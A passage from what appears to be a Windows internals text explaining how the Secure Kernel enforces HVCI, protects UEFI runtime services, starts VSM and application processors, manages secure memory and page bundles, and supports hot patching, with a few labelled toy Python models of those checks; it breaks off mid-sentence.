W^X (pronounced double-you xor ex) characteristic of the VTL 0 kernel memory. The NT kernel can't
map and execute any kind of executable memory in kernel mode without the aid of the Secure Kernel.
The Secure Kernel allows only properly digitally signed drivers to run in the machine's kernel. As we
discuss in the next section, the Secure Kernel keeps track of every virtual page allocated in the normal NT
kernel; memory pages marked as executable in the NT kernel are considered privileged pages. Only the
Secure Kernel can write to them after the SKCI module has correctly verified their content.
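The W^X rule can be illustrated with a toy page-protection check. The `skci_verify` stand-in and the rights representation are inventions; only the policy — no page both writable and executable, and executable only after the SKCI module has verified the content — comes from the text.

```python
# Conceptual W^X enforcement in the spirit of HVCI (all names invented).
pages = {}   # page_number -> set of rights, a subset of {"R", "W", "X"}

def skci_verify(image_bytes):
    # Stand-in for Skci.dll's digital-signature verification: here we just
    # check for a PE header magic as a placeholder.
    return image_bytes.startswith(b"MZ")

def protect_page(pfn, rights, image_bytes=b""):
    rights = set(rights)
    if "W" in rights and "X" in rights:
        return "denied: W^X violation"         # never writable AND executable
    if "X" in rights and not skci_verify(image_bytes):
        return "denied: unsigned code"         # executable only after verification
    pages[pfn] = rights
    return "granted"
```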
You can read more about HVCI in Chapter 7 of Part 1, in the “Device Guard” and “Credential
Guard” sections.
UEFI runtime virtualization
Another service provided by the Secure Kernel (when HVCI is enabled) is the ability to virtualize and
protect the UEFI runtime services. As we discuss in Chapter 12, the UEFI firmware services are mainly
implemented by using a big table of function pointers. Part of the table will be deleted from memory
after the OS takes control and calls the ExitBootServices function, but another part of the table, which
represents the Runtime services, will remain mapped even after the OS has already taken full control
of the machine. Indeed, this is necessary because sometimes the OS needs to interact with the UEFI
configuration and services.
Every hardware vendor implements its own UEFI firmware. With HVCI, the firmware should cooperate
to provide the nonwritable state of each of its executable memory pages (no firmware page can be
mapped in VTL 0 with read, write, and execute state). The memory range in which the UEFI firmware
resides is described by multiple MEMORY_DESCRIPTOR data structures located in the EFI memory map.
The Windows Loader parses this data with the goal of properly protecting the UEFI firmware's memory.
Unfortunately, in the original implementation of UEFI, the code and data were stored mixed in a single
section (or multiple sections) and were described by relative memory descriptors. Furthermore, some
device drivers read or write configuration data directly from the UEFI’s memory regions. This clearly
was not compatible with HVCI.
To overcome this problem, the Secure Kernel employs the following two strategies:
■	New versions of the UEFI firmware (which adhere to UEFI 2.6 and higher specifications) maintain
a new configuration table (linked in the boot services table), called the memory attribute table
(MAT). The MAT defines fine-grained sections of the UEFI memory region, which are subsections
of the memory descriptors defined by the EFI memory map. Each section never has both the
executable and writable protection attributes.
■	For old firmware, the Secure Kernel maps in VTL 0 the entire UEFI firmware region's physical
memory with a read-only access right.
In the first strategy, at boot time, the Windows Loader merges the information found both in the EFI
memory map and in the MAT, creating an array of memory descriptors that precisely describe the entire
firmware region. It then copies them in a reserved buffer located in VTL 1 (used in the hibernation path)
and verifies that each firmware section doesn't violate the W^X assumption. If the verification
succeeds, when the Secure Kernel starts, it applies a proper SLAT protection to every page that
belongs to the underlying UEFI
firmware region. The physical pages are protected by the SLAT, but their virtual address space in VTL 0
is still entirely marked as RWX. Keeping the virtual memory’s RWX protection is important because the
Secure Kernel must support resume-from-hibernation in a scenario where the protection applied in the
MAT entries can change. Furthermore, this maintains the compatibility with older drivers, which read or
write directly from the UEFI memory region, assuming that the write is performed in the correct sections.
(Also, the UEFI code should be able to write in its own memory, which is mapped in VTL 0.) This strategy
allows the Secure Kernel to avoid mapping any firmware code in VTL 1; the only part of the firmware that
remains in VTL 1 is the Runtime function table itself. Keeping the table in VTL 1 allows the
resume-from-hibernation code to update the UEFI runtime services' function pointers directly.
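The boot-time check can be sketched as follows. The MAT and memory-map structures are simplified inventions; the two verified properties (each MAT section subdivides an EFI memory-map descriptor, and no section is both writable and executable) come from the text.

```python
# Sketch of the Windows Loader's verification of MAT sections (structures
# simplified and invented for illustration).
efi_memory_map = [  # (start, end) of one UEFI runtime memory descriptor
    (0x8000_0000, 0x8010_0000),
]
mat = [             # (start, end, attributes) — finer-grained MAT sections
    (0x8000_0000, 0x8008_0000, {"X"}),       # runtime code
    (0x8008_0000, 0x8010_0000, {"W"}),       # runtime data
]

def verify_mat(memory_map, mat_entries):
    for start, end, attrs in mat_entries:
        # Each MAT section must be a subsection of some EFI descriptor.
        inside = any(s <= start and end <= e for s, e in memory_map)
        if not inside:
            return False
        # No section may be both writable and executable (W^X).
        if {"W", "X"} <= attrs:
            return False
    return True
```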
The second strategy is not optimal and is used only for allowing old systems to run with HVCI
enabled. When the Secure Kernel doesn’t find any MAT in the firmware, it has no choice except to map
the entire UEFI runtime services code in VTL 1. Historically, multiple bugs have been discovered in the
UEFI firmware code (in SMM especially). Mapping the firmware in VTL 1 could be dangerous, but it’s the
only solution compatible with HVCI. (New systems, as stated before, never map any UEFI firmware code
in VTL 1.) At startup time, the NT HAL detects that HVCI is on and that the firmware is entirely mapped
in VTL 1. So, it switches its internal EFI service table pointer to a new table, called the UEFI wrapper table.
Entries of the wrapper table contain stub routines that use the INVOKE_EFI_RUNTIME_SERVICE secure
call to enter in VTL 1. The Secure Kernel marshals the parameters, executes the firmware call, and yields
the results to VTL 0. In this case, all the physical memory that describes the entire UEFI firmware is still
mapped in read-only mode in VTL 0. The goal is to allow drivers to correctly read information from the
UEFI firmware memory region (like ACPI tables, for example). Old drivers that directly write into UEFI
memory regions are not compatible with HVCI in this scenario.
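The wrapper-table mechanism can be modeled as a table of stubs. The INVOKE_EFI_RUNTIME_SERVICE name comes from the text; the service set, the "firmware" functions, and the marshaling are simulated stand-ins.

```python
# Toy model of the UEFI wrapper table used on old firmware: each HAL entry
# becomes a stub that enters VTL 1 via the INVOKE_EFI_RUNTIME_SERVICE secure
# call, where the (simulated) firmware function actually runs.
firmware_services = {               # "mapped in VTL 1" on old systems
    "GetTime": lambda: "12:00",
    "GetVariable": lambda: b"\x01",
}

def invoke_efi_runtime_service(name):
    # Secure call: the Secure Kernel marshals the parameters, executes the
    # firmware call in VTL 1, and yields the result back to VTL 0.
    return firmware_services[name]()

def build_wrapper_table(service_names):
    # Each wrapper-table entry is a stub bound to one service name.
    return {name: (lambda n=name: invoke_efi_runtime_service(n))
            for name in service_names}

hal_efi_table = build_wrapper_table(firmware_services)
```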
When the Secure Kernel resumes from hibernation, it updates the in-memory UEFI service table
to point to the new services’ location. Furthermore, in systems that have the new UEFI firmware, the
Secure Kernel reapplies the SLAT protection on each memory region mapped in VTL 0 (the Windows
Loader is able to change the regions’ virtual addresses if needed).
VSM startup
Although we describe the entire Windows startup and shutdown mechanism in Chapter 12, this
section describes the way in which the Secure Kernel and all the VSM infrastructure are started. The
Secure Kernel is dependent on the hypervisor, the Windows Loader, and the NT kernel to properly start up.
We discuss the Windows Loader, the hypervisor loader, and the preliminary phases by which the Secure
Kernel is initialized in VTL 0 by these two modules in Chapter 12. In this section, we focus on the VSM
startup method, which is implemented in the securekernel.exe binary.
The first code executed by the securekernel.exe binary is still running in VTL 0; the hypervisor already
has been started, and the page tables used for VTL 1 have been built. The Secure Kernel initializes the
following components in VTL 0:
■	The memory manager's initialization function stores the PFN of the VTL 0 root-level page-level
structure, saves the code integrity data, and enables HVCI, MBEC (Mode-Based Execution
Control), kernel CFG, and hot patching.
■	Shared architecture-specific CPU components, like the GDT and IDT.
■	Normal calls and secure system calls dispatch tables (initialization and compaction).
■	The boot processor. The process of starting the boot processor requires the Secure Kernel to
allocate its kernel and interrupt stacks; initialize the architecture-specific components, which
can't be shared between different processors (like the TSS); and finally allocate the processor's
SKPRCB. The latter is an important data structure, which, like the PRCB data structure in VTL 0,
is used to store important information associated with each CPU.
The Secure Kernel initialization code is ready to enter VTL 1 for the first time. The hypervisor subsystem
initialization function (ShvlInitSystem routine) connects to the hypervisor (through the hypervisor CPUID
classes; see the previous section for more details) and checks the supported enlightenments. Then it saves
the VTL 1’s page table (previously created by the Windows Loader) and the allocated hypercall pages
(used for holding hypercall parameters). It finally initializes and enters VTL 1 in the following way:
1.	Enables VTL 1 for the current hypervisor partition through the HvEnablePartitionVtl hypercall.
The hypervisor copies the existing SLAT table of the normal VTL to VTL 1 and enables MBEC and
the new VTL 1 for the partition.
2.	Enables VTL 1 for the boot processor through the HvEnableVpVtl hypercall. The hypervisor
initializes a new per-level VMCS data structure, compiles it, and sets the SLAT table.
3.	Asks the hypervisor for the location of the platform-dependent VtlCall and VtlReturn hypercall
code. The CPU opcodes needed for performing VSM calls are hidden from the Secure Kernel
implementation. This allows most of the Secure Kernel's code to be platform-independent.
Finally, the Secure Kernel executes the transition to VTL 1 through the HvVtlCall hypercall. The
hypervisor loads the VMCS for the new VTL and switches to it (making it active). This basically
renders the new VTL runnable.
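The three steps above can be sketched as a sequence recorder. The hypercall names come from the text; everything else (the log, the helper signatures) is invented for illustration.

```python
# Sketch of the VTL 1 bring-up order (hypercall names from the text; the
# logging scaffolding is invented).
hypercall_log = []

def hv_enable_partition_vtl(vtl):
    # Hypervisor copies the normal VTL's SLAT table and enables MBEC.
    hypercall_log.append(("HvEnablePartitionVtl", vtl))

def hv_enable_vp_vtl(vp, vtl):
    # Hypervisor initializes a new per-VTL VMCS for this virtual processor.
    hypercall_log.append(("HvEnableVpVtl", vp, vtl))

def hv_vtl_call():
    # Hypervisor loads the VTL 1 VMCS and switches to it.
    hypercall_log.append(("HvVtlCall",))

def start_vtl1(boot_vp=0):
    hv_enable_partition_vtl(1)
    hv_enable_vp_vtl(boot_vp, 1)
    hv_vtl_call()
    return hypercall_log

log = start_vtl1()
```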
The Secure Kernel starts a complex initialization procedure in VTL 1, which still depends on the
Windows Loader and also on the NT kernel. It is worth noting that, at this stage, VTL 1 memory is still
identity-mapped in VTL 0; the Secure Kernel and its dependent modules are still accessible to the
normal world. After the switch to VTL 1, the Secure Kernel initializes the boot processor:
1.	Gets the virtual address of the synthetic interrupt controller shared page, TSC page, and VP
assist page, which are provided by the hypervisor for sharing data between the hypervisor and
VTL 1 code. Maps the hypercall page in VTL 1.
2.	Blocks the possibility for other system virtual processors to be started by a lower VTL and
requests the hypervisor to zero-fill the memory on reboot.
3.	Initializes and fills the boot processor's Interrupt Descriptor Table (IDT). Configures the IPI,
callbacks, and secure timer interrupt handlers and sets the current secure thread as the default
SKPRCB thread.
4.	Starts the VTL 1 secure memory manager, which creates the boot table mapping and maps the
boot loader's memory in VTL 1, creates the secure PFN database and system hyperspace,
initializes the secure memory pool support, and reads the VTL 0 loader block to copy the
module descriptors of the Secure Kernel's imported images (Skci.dll, Cng.sys, and Vmsvcext.sys).
It finally walks the NT loaded module list to establish each driver's state, creating a NAR
(normal address range) data structure for each one and compiling a normal table entry (NTE)
for every page composing the boot driver's sections. Furthermore, the secure memory manager
initialization function applies the correct VTL 0 SLAT protection to each driver's sections.
5.	Initializes the HAL, the secure threads pool, the process subsystem, the synthetic APIC, Secure
PNP, and Secure PCI.
6.	Applies a read-only VTL 0 SLAT protection for the Secure Kernel pages, configures MBEC, and
enables the VINA virtual interrupt on the boot processor.
When this part of the initialization ends, the Secure Kernel unmaps the boot-loaded memory. The
secure memory manager, as we discuss in the next section, depends on the VTL 0 memory manager for
being able to allocate and free VTL 1 memory. VTL 1 does not own any physical memory; at this stage,
it relies on some previously allocated (by the Windows Loader) physical pages for being able to satisfy
memory allocation requests. When the NT kernel later starts, the Secure Kernel performs normal calls for
requesting memory services to the VTL 0 memory manager. As a result, some parts of the Secure Kernel
initialization must be deferred until after the NT kernel is started. Execution flow returns to the
Windows Loader in VTL 0. The latter loads and starts the NT kernel. The last part of the Secure Kernel
initialization happens in phase 0 and phase 1 of the NT kernel initialization (see Chapter 12 for further details).
Phase 0 of the NT kernel initialization still has no memory services available, but this is the last
moment in which the Secure Kernel fully trusts the normal world. Boot-loaded drivers still have not
been initialized and the initial boot process should have been already protected by Secure Boot. The
PHASE3_INIT secure call handler modifies the SLAT protections of all the physical pages belonging
to the Secure Kernel and to its dependent modules, rendering them inaccessible to VTL 0. Furthermore, it
applies a read-only protection to the kernel CFG bitmaps. At this stage, the Secure Kernel enables the
support for pagefile integrity, creates the initial system process and its address space, and saves all the
“trusted” values of the shared CPU registers (like IDT, GDT, Syscall MSR, and so on). The data structures
that the shared registers point to are verified (thanks to the NTE database). Finally, the secure thread
pool is started and the object manager, the secure code integrity module (Skci.dll), and HyperGuard
are initialized (more details on HyperGuard are available in Chapter 7 of Part 1).
When the execution flow is returned to VTL 0, the NT kernel can then start all the other application
processors (APs). When the Secure Kernel is enabled, the APs' initialization happens in a slightly
different way (we discuss AP initialization in the next section).
As part of phase 1 of the NT kernel initialization, the system starts the I/O manager. The I/O
manager, as discussed in Part 1, Chapter 6, "I/O system," is the core of the I/O system and defines
the model within which I/O requests are delivered to device drivers. One of the duties of the I/O
manager is to initialize and start the boot-loaded and ELAM drivers. Before creating the special
sections for mapping the
user mode system DLLs, the I/O manager initialization function emits a PHASE4_INIT secure call to start
the last initialization phase of the Secure Kernel. At this stage, the Secure Kernel does not trust the VTL 0
anymore, but it can use the services provided by the NT memory manager. The Secure Kernel initializes
the content of the Secure User Shared data page (which is mapped both in VTL 1 user mode and kernel
mode) and finalizes the executive subsystem initialization. It reclaims any resources that were reserved
during the boot process and calls each of its dependent modules' entry points (in particular, Cng.sys
and Vmsvcext.sys, which start before any normal boot drivers). It allocates the necessary resources for the
encryption of the hibernation, crash-dump, paging files, and memory-page integrity. It finally reads and
maps the API set schema file in VTL 1 memory. At this stage, VSM is completely initialized.
Application processors (APs) startup
One of the security features provided by the Secure Kernel is the startup of the application processors
(APs), which are the ones not used to boot up the system. When the system starts, the Intel and AMD
specifications of the x86 and AMD64 architectures define a precise algorithm that chooses the
bootstrap processor (BSP) in multiprocessor systems. The boot processor always starts in 16-bit
real mode (where it's able to access only 1 MB of physical memory) and usually executes the
machine's firmware code (UEFI in most cases), which needs to be located at a specific physical
memory location (called the reset vector). The boot processor executes almost all of the
initialization of the OS, hypervisor, and Secure Kernel. For starting other non-boot processors,
the system needs to send a special IPI
(inter-processor interrupt) to the local APICs belonging to each processor. The startup IPI (SIPI) vector
contains the physical memory address of the processor start block, a block of code that includes the
instructions for performing the following basic operations:
1.	Load a GDT and switch from 16-bit real mode to 32-bit protected mode (with no paging enabled).
2.	Set up a basic page table, enable paging, and enter 64-bit long mode.
3.	Load the 64-bit IDT and GDT, set the proper processor registers, and jump to the OS startup
function (KiSystemStartup).
This process is vulnerable to malicious attacks. The processor startup code could be modified by
external entities while it is executing on the AP (the NT kernel has no control at this point). In this
case, all the security guarantees brought by VSM could be easily defeated. When the hypervisor
and the Secure Kernel are enabled, the application processors are still started by the NT kernel but
by using the hypervisor.
KeStartAllProcessors, the function called by phase 1 of the NT kernel initialization (see Chapter 12
for more details) with the goal of starting all the APs, builds a shared IDT and enumerates
all the available processors by consulting the Multiple APIC Description Table (MADT) ACPI table. For
each discovered processor, it allocates memory for the PRCB and all the private CPU data structures for
the kernel and DPC stack. If the VSM is enabled, it then starts the AP by sending a START_PROCESSOR
secure call to the Secure Kernel. The latter validates that all the data structures allocated and filled
for the new processor are valid, including the initial values of the processor registers and the startup
routine (KiSystemStartup), and ensures that the AP startups happen sequentially and only once per
processor. It then initializes the VTL 1 data structures needed for the new application processor (the
SKPRCB in particular). The PRCB thread, which is used for dispatching the Secure Calls in the context
of the new processor, is started, and the VTL 0 CPU data structures are protected by using the SLAT.
The Secure Kernel finally enables VTL 1 for the new application processor and starts it by using the
HvStartVirtualProcessor hypercall. The hypervisor starts the AP in a similar way to that described at
the beginning of this section (by sending the startup IPI). In this case, however, the AP starts its
execution in the hypervisor context, switches to 64-bit long mode execution, and returns to VTL 1.
The first function executed by the application processor resides in VTL 1. The Secure Kernel’s CPU
initialization routine maps the per-processor VP assist page and SynIC control page, configures MBEC,
and enables the VINA. It then returns to VTL 0 through the HvVtlReturn hypercall. The first routine exe-
cuted in VTL 0 is KiSystemStartup, which initializes the data structures needed by the NT kernel to man-
age the AP, initializes the HAL, and jumps to the idle loop (read more details in Chapter 12). The Secure
Call dispatch loop is initialized later by the normal NT kernel when the first secure call is executed.
With the described secure AP start-up, an attacker can't modify the processor startup block or any
initial value of the CPU's registers and data structures: any modification would be detected by the
Secure Kernel, which would bug check the system to defeat the attack.
The Secure Kernel memory manager
The Secure Kernel memory manager heavily depends on the NT memory manager (and on the
Windows Loader memory manager for its startup code). Entirely describing the Secure Kernel memory
manager is outside the scope of this book. Here we discuss only the most important concepts and data
structures used by the Secure Kernel.
As mentioned in the previous section, the Secure Kernel memory manager initialization is divided
into three phases. In phase 1, the most important, the memory manager performs the following:
1. Maps the boot loader firmware memory descriptor list in VTL 1, scans the list, and determines the first physical page that it can use for allocating the memory needed for its initial startup (this memory type is called SLAB). Maps the VTL 0 page tables at a virtual address located exactly 512 GB below the VTL 1 page tables. This allows the Secure Kernel to perform a fast conversion between an NT virtual address and a Secure Kernel one.
2. Initializes the PTE range data structures. A PTE range contains a bitmap that describes each chunk of allocated virtual address range and helps the Secure Kernel allocate PTEs for its own address space.
3. Creates the Secure PFN database and initializes the memory pool.
4. Initializes the sparse NT address table. For each boot-loaded driver, it creates and fills a NAR, verifies the integrity of the binary, fills in the hot patch information, and, if HVCI is on, protects each executable section of the driver using the SLAT. It then cycles through each PTE of the memory image and writes an NT Address Table Entry (NTE) in the NT address table.
5. Initializes the page bundles.
The Secure Kernel keeps track of the memory that the normal NT kernel uses. The Secure Kernel
memory manager uses the NAR data structure for describing a kernel virtual address range that
contains executable code. The NAR contains some information about the range (such as its base address
and size) and a pointer to a SECURE_IMAGE data structure, which is used for describing runtime drivers
(in general, images verified using Secure HVCI, including user mode images used for trustlets) loaded
in VTL 0. Boot-loaded drivers do not use the SECURE_IMAGE data structure because they are treated
by the NT memory manager as private pages that contain executable code. The SECURE_IMAGE data structure
contains information regarding a loaded image in the NT kernel (which is verified by SKCI), like the
address of its entry point, a copy of its relocation tables (used also for dealing with Retpoline and Import
Optimization), the pointer to its shared prototype PTEs, hot-patch information, and a data structure
that specifies the authorized use of its memory pages. The SECURE_IMAGE data structure is very
important because it’s used by the Secure Kernel to track and verify the shared memory pages that
are used by runtime drivers.
For tracking VTL 0 kernel private pages, the Secure Kernel uses the NTE data structure. An NTE ex-
ists for every virtual page in the VTL 0 address space that requires supervision from the Secure Kernel;
it’s often used for private pages. An NTE tracks a VTL 0 virtual page’s PTE and stores the page state and
protection. When HVCI is enabled, the NTE table divides all the virtual pages between privileged and
non-privileged. A privileged page represents a memory page that the NT kernel is not able to touch on
its own because it’s protected through SLAT and usually corresponds to an executable page or to a kernel
CFG read-only page. A nonprivileged page represents all the other types of memory pages that the NT
kernel has full control over. The Secure Kernel uses invalid NTEs to represent nonprivileged pages. When
HVCI is off, all the private pages are nonprivileged (indeed, the NT kernel has full control of all its pages).
In HVCI-enabled systems, the NT memory manager can’t modify any protected pages. Otherwise,
an EPT violation exception will be raised in the hypervisor, resulting in a system crash. After those systems
complete their boot phase, the Secure Kernel has already processed all the nonexecutable physical
pages by SLAT-protecting them only for read and write access. In this scenario, new executable pages
can be allocated only if the target code has been verified by Secure HVCI.
When the system, an application, or the Plug and Play manager requires the loading of a new runtime
driver, a complex procedure starts that involves the NT and the Secure Kernel memory managers,
summarized here:
1. The NT memory manager creates a section object, allocates and fills a new control area (more details about the NT memory manager are available in Chapter 5 of Part 1), reads the first page of the binary, and calls the Secure Kernel with the goal of creating the relative secure image, which describes the newly loaded module.
2. The Secure Kernel creates the SECURE_IMAGE data structure, parses all the sections of the binary file, and fills the secure prototype PTEs array.
3. The NT kernel reads the entire binary into nonexecutable shared memory (pointed to by the prototype PTEs of the control area). It then calls the Secure Kernel, which, using Secure HVCI, cycles through each section of the binary image and calculates the final image hash.
4. If the calculated file hash matches the one stored in the digital signature, the NT memory manager walks the entire image and for each page calls the Secure Kernel, which validates the page (each page hash has already been calculated in the previous phase), applies the needed relocations (ASLR, Retpoline, and Import Optimization), and applies the new SLAT protection, allowing the page to be executable but no longer writable.
5. The section object has now been created. The NT memory manager needs to map the driver into its address space, so it calls the Secure Kernel to allocate the needed privileged PTEs for describing the driver's virtual address range. The Secure Kernel creates the NAR data structure. It then maps the physical pages of the driver, which have previously been verified, using the MiMapSystemImage routine.
Note When a NAR is initialized for a runtime driver, part of the NTE table is filled for describing
the new driver address space. The NTEs are not used for keeping track of a runtime
driver’s virtual address range (its virtual pages are shared and not private), so the relative
part of the NT address table is filled with invalid “reserved” NTEs.
While VTL 0 kernel virtual address ranges are represented using the NAR data structure, the Secure
Kernel uses secure VADs (virtual address descriptors) to track user-mode virtual addresses in VTL 1.
Secure VADs are created every time a new private virtual allocation is made, a binary image is mapped
into the address space of a trustlet (secure process), or a VBS enclave is created or a module is
mapped into its address space. A secure VAD is similar to the NT kernel VAD and contains a descriptor
of the VA range, a reference counter, some flags, and a pointer to the Secure section, which has been
created by SKCI. (The secure section pointer is set to 0 in case of secure VADs describing private virtual
allocations.) More details about Trustlets and VBS-based enclaves will be discussed later in this chapter.
Page identity and the secure PFN database
After a driver is loaded and mapped correctly into VTL 0 memory, the NT memory manager needs to
be able to manage its memory pages (for various reasons, like the paging out of a pageable driver’s
section, the creation of private pages, the application of private fixups, and so on; see Chapter 5 in
Part 1 for more details). Every time the NT memory manager operates on protected memory, it needs
the cooperation of the Secure Kernel. Two main kinds of secure services are offered to the NT memory
manager for operating with privileged memory: protected pages copy and protected pages removal.
A PAGE_IDENTITY data structure is the glue that allows the Secure Kernel to keep track of all the
different kinds of pages. The data structure is composed of two fields: an Address Context and a Virtual
Address. Every time the NT kernel calls the Secure Kernel for operating on privileged pages, it needs
to specify the physical page number along with a valid PAGE_IDENTITY data structure describing what
the physical page is used for. Through this data structure, the Secure Kernel can verify the requested
page usage and decide whether to allow the request.
Table 9-4 shows the PAGE_IDENTITY data structure (second and third columns), and all the types of
verification performed by the Secure Kernel on different memory pages:
• If the Secure Kernel receives a request to copy or to release a shared executable page of a runtime driver, it validates the secure image handle (specified by the caller) and gets its relative data structure (SECURE_IMAGE). It then uses the relative virtual address (RVA) as an index into the secure prototype array to obtain the physical page frame (PFN) of the driver's shared page. If the found PFN is equal to the caller's specified one, the Secure Kernel allows the request; otherwise, it blocks it.
• In a similar way, if the NT kernel requests to operate on a trustlet or an enclave page (more details about trustlets and secure enclaves are provided later in this chapter), the Secure Kernel uses the caller's specified virtual address to verify that the secure PTE in the secure process page table contains the correct PFN.
• As introduced earlier in the section "The Secure Kernel memory manager", for private kernel pages, the Secure Kernel locates the NTE starting from the caller's specified virtual address and verifies that it contains a valid PFN, which must be the same as the caller's specified one.
• Placeholder pages are free pages that are SLAT protected. The Secure Kernel verifies the state of a placeholder page by using the PFN database.
TABLE 9-4 Different page identities managed by the Secure Kernel

Page Type          Address Context          Virtual Address                          Verification Structure
Kernel Shared      Secure Image Handle      RVA of the page                          Secure Prototype PTE
Trustlet/Enclave   Secure Process Handle    Virtual Address of the Secure Process    Secure PTE
Kernel Private     0                        Kernel Virtual Address of the page       NT address table entry (NTE)
Placeholder        0                        0                                        PFN entry
The Secure Kernel memory manager maintains a PFN database to represent the state of each physi-
cal page. A PFN entry in the Secure Kernel is much smaller compared to its NT equivalent; it basically
contains the page state and the share counter. A physical page, from the Secure Kernel perspective, can
be in one of the following states: invalid, free, shared, I/O, secured, or image (secured NT private).
The secured state is used for physical pages that are private to the Secure Kernel (the NT kernel can
never claim them) or for physical pages that have been allocated by the NT kernel and later SLAT-
protected by the Secure Kernel for storing executable code verified by Secure HVCI. Only secured
nonprivate physical pages have a page identity.
When the NT kernel is going to page out a protected page, it asks the Secure Kernel for a page remov-
al operation. The Secure Kernel analyzes the specified page identity and does its verification (as explained
earlier). In case the page identity refers to an enclave or a trustlet page, the Secure Kernel encrypts the
page’s content before releasing it to the NT kernel, which will then store the page in the paging file. In this
way, the NT kernel still has no chance to intercept the real content of the private memory.
Secure memory allocation
As discussed in previous sections, when the Secure Kernel initially starts, it parses the firmware’s mem-
ory descriptor lists, with the goal of being able to allocate physical memory for its own use. In phase
1 of its initialization, the Secure Kernel can’t use the memory services provided by the NT kernel (the
NT kernel indeed is still not initialized), so it uses free entries of the firmware’s memory descriptor lists
for reserving 2-MB SLABs. A SLAB is a 2-MB block of contiguous physical memory, mapped by a single
nested page table directory entry in the hypervisor. All the SLAB pages have the same SLAT protec-
tion. SLABs have been designed for performance considerations. By mapping a 2-MB chunk of physical
memory using a single nested page entry in the hypervisor, the additional hardware memory address
translation is faster and results in fewer cache misses on the SLAT table.
The first Secure Kernel page bundle is filled with 1 MB of the allocated SLAB memory. A page bundle
is the data structure shown in Figure 9-37, which contains a list of contiguous free physical page frame
numbers (PFNs). When the Secure Kernel needs memory for its own purposes, it allocates physical
pages from a page bundle by removing one or more free page frames from the tail of the bundle’s
PFNs array. In this case, the Secure Kernel doesn’t need to check the firmware memory descriptors list
until the bundle has been entirely consumed. When phase 3 of the Secure Kernel initialization is
done, the memory services of the NT kernel become available, and so the Secure Kernel frees any boot
memory descriptor lists, retaining the physical memory pages previously placed in bundles.
Future secure memory allocations use normal calls provided by the NT kernel. Page bundles have
been designed to minimize the number of normal calls needed for memory allocation. When a bundle
gets fully allocated, it contains no pages (all its pages are currently assigned), and a new one will be
generated by asking the NT kernel for 1 MB of contiguous physical pages (through the
ALLOC_PHYSICAL_PAGES normal call). The physical memory will be allocated by the NT kernel from the proper SLAB.
In the same way, every time the Secure Kernel frees some of its private memory, it stores the cor-
responding physical pages in the correct bundle by growing its PFN array until the limit of 256 free
pages. When the array is entirely filled, and the bundle becomes free, a new work item is queued. The
work item will zero-out all the pages and will emit a FREE_PHYSICAL_PAGES normal call, which ends up
in executing the MmFreePagesFromMdl function of the NT memory manager.
Every time enough pages are moved into and out of a bundle, they are fully protected in VTL 0 by
using the SLAT (this procedure is called “securing the bundle”). The Secure Kernel supports three kinds
of bundles, which all allocate memory from different SLABs: No access, Read-only, and Read-Execute.
[Figure content: a page bundle with a header (NumberOfPages: 80, Next Bundle PFN, Flags) followed by a PFN array of 256 entries; 80 entries hold valid free PFNs, and the remaining entries are invalid because they are in use.]

FIGURE 9-37 A secure page bundle with 80 available pages. A bundle is composed of a header and a free PFNs array.
Hot patching
Several years ago, the 32-bit versions of Windows supported hot patching of the operating
system's components. Patchable functions contained a redundant 2-byte opcode in their prolog and
some padding bytes located before the function itself. This allowed the NT kernel to dynamically
replace the initial opcode with an indirect jump, which uses the free space provided by the padding, to
divert the code to a patched function residing in a different module. The feature was heavily used by
Windows Update, which allowed the system to be updated without the need for an immediate reboot
of the machine. When moving to 64-bit architectures, this was no longer possible due to various
problems. Kernel patch protection was a good example; there was no longer a reliable way to modify
a protected kernel mode binary and to allow PatchGuard to be updated without exposing some of its
private interfaces, and exposed PatchGuard interfaces could have been easily exploited by an attacker
with the goal to defeat the protection.
The Secure Kernel has solved all the problems related to 64-bit architectures and has reintroduced
to the OS the ability to hot patch kernel binaries. While the Secure Kernel is enabled, the following
types of executable images can be hot patched:
• VTL 0 user-mode modules (both executables and libraries)
• Kernel mode drivers, the HAL, and the NT kernel binary, whether or not protected by PatchGuard
• The Secure Kernel binary and its dependent modules, which run in VTL 1 kernel mode
• The hypervisor (Intel, AMD, and ARM versions)
Patch binaries created for targeting software running in VTL 0 are called normal patches, whereas
the others are called secure patches. If the Secure Kernel is not enabled, only user mode applications
can be patched.
A hot patch image is a standard Portable Executable (PE) binary that includes the hot patch table, the
data structure used for tracking the patch functions. The hot patch table is linked in the binary through
the image load configuration data directory. It contains one or more descriptors that describe each
patchable base image, which is identified by its checksum and time date stamp. (In this way, a hot patch
is compatible only with the correct base images. The system can’t apply a patch to the wrong image.) The
hot patch table also includes a list of functions or global data chunks that need to be updated in the base
or in the patch image; we describe the patch engine shortly. Every entry in this list contains the functions'
offsets in the base and patch images and the original bytes of the base function that will be replaced.
Multiple patches can be applied to a base image, but the patch application is idempotent. The same
patch may be applied multiple times, or different patches may be applied in sequence. Regardless, the
last applied patch will be the active patch for the base image. When the system needs to apply a hot
patch, it uses the NtManageHotPatch system call, which is employed to install, remove, or manage hot
patches. (The system call supports different “patch information” classes for describing all the possible
operations.) A hot patch can be installed globally for the entire system, or, if a patch is for user mode
code (VTL 0), for all the processes that belong to a specific user session.
When the system requests the application of a patch, the NT kernel locates the hot patch table in
the patch binary and validates it. It then uses the DETERMINE_HOT_PATCH_TYPE secure call to securely
determine the type of patch. In the case of a secure patch, only the Secure Kernel can apply it, so the
APPLY_HOT_PATCH secure call is used; no other processing by the NT kernel is needed. In all the other
cases, the NT kernel first tries to apply the patch to a kernel driver. It cycles between each loaded kernel
module, searching for a base image that has the same checksum described by one of the patch image’s
hot patch descriptors.
Hot patching is enabled only if the HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control
\Session Manager\Memory Management\HotPatchTableSize registry value is a multiple of a standard
memory page size (4,096). Indeed, when hot patching is enabled, every image that is mapped in the
virtual address space needs to have a certain amount of virtual address space reserved immediately
after the image itself. This reserved space is used for the image’s hot patch address table (HPAT, not to
be confused with the hot patch table). The HPAT is used to minimize the amount of padding neces-
sary for each function to be patched by storing the address of the new function in the patched image.
When patching a function, the HPAT location will be used to perform an indirect jump from the original
function in the base image to the patched function in the patch image (note that for Retpoline compat-
ibility, another kind of Retpoline routine is used instead of an indirect jump).
When the NT kernel finds a kernel mode driver suitable for the patch, it loads and maps the patch
binary in the kernel address space and creates the related loader data table entry (for more details,
see Chapter 12). It then scans each memory page of both the base and the patch images and locks in
memory the ones involved in the hot patch (this is important; in this way, the pages can’t be paged out
to disk while the patch application is in progress). It finally emits the APPLY_HOT_PATCH secure call.
The real patch application process starts in the Secure Kernel. The latter captures and verifies the hot
patch table of the patch image (by remapping the patch image also in VTL 1) and locates the base im-
